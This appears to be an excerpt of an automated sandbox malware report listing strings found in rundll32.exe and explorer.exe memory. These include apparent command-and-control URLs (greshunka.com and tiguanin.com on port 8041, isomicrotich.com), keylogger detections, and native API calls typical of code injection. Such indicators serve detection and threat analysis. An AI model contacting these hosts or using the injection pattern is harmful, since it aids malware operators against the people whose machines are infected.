Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
Source: explorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com/vi
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com/~i
Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/)
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/0
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/E
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/M
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.php
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.php1
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpQ
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpad
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpn
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpo
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.php
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.php.
Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.phpad
Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.phpy
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/net.com:8041/0
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/
Source: explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/a
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000862F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/&
Source: explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/H
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/T
Source: explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/a
Source: explorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/ons
Source: explorer.exe, 0000001E.00000002.2586707212.000000000841D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://opewolumeras.com/test/
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com/
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com/zi
Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/
Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/0
Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/;
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/E
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/N
Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.php
Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpA
Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpN
Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpW
Source: rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpte
Source: rundll32.exe, 00000017.00000002.2575784572.0000029F39CD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.php
Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpk
Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpn
Source: rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/in.com:8041/
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/in.com:8041/bazar.php
Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/net.com:8041/
Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/p
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001E.00000000.1578935505.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.2292493778.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000899E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.stacker.com/arizona/phoenix
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.yelp.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49773 version: TLS 1.2

Creates a DirectInput object (often for capturing keystrokes)

Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_81e4c7c7-f

Installs a raw input device (often for capturing keystrokes)

Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_afbc3cd5-b

Yara detected Keylogger Generic

Source: Yara match	File source: 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7DD9FE NtOpenFile,	23_3_0000029F3B7DD9FE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7DDACE NtReadFile,	23_3_0000029F3B7DDACE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7DD98E NtAllocateVirtualMemory,	23_3_0000029F3B7DD98E
Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7DDA6E NtProtectVirtualMemory,	23_3_0000029F3B7DDA6E
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F7A50 NtSetContextThread,	23_2_0000029F3B8F7A50
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F55C0 NtClose,NtTerminateThread,	23_2_0000029F3B8F55C0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9151C0 NtReadVirtualMemory,	23_2_0000029F3B9151C0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9145F0 NtDuplicateObject,	23_2_0000029F3B9145F0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E1600 NtClose,RtlExitUserThread,	23_2_0000029F3B8E1600
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F8149 NtSetContextThread,	23_2_0000029F3B8F8149
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E71B0 NtClose,	23_2_0000029F3B8E71B0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F8C60 NtClose,CreateFiber,DeleteFiber,	23_2_0000029F3B8F8C60
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B914FF0 NtQueueApcThread,	23_2_0000029F3B914FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B914BE0 NtProtectVirtualMemory,	23_2_0000029F3B914BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B913F40 NtAllocateVirtualMemory,	23_2_0000029F3B913F40
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B914740 NtFreeVirtualMemory,	23_2_0000029F3B914740
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B914360 NtCreateThreadEx,	23_2_0000029F3B914360
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,NtClose,	23_2_0000029F3B8FF3A0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E17B0 NtClose,	23_2_0000029F3B8E17B0
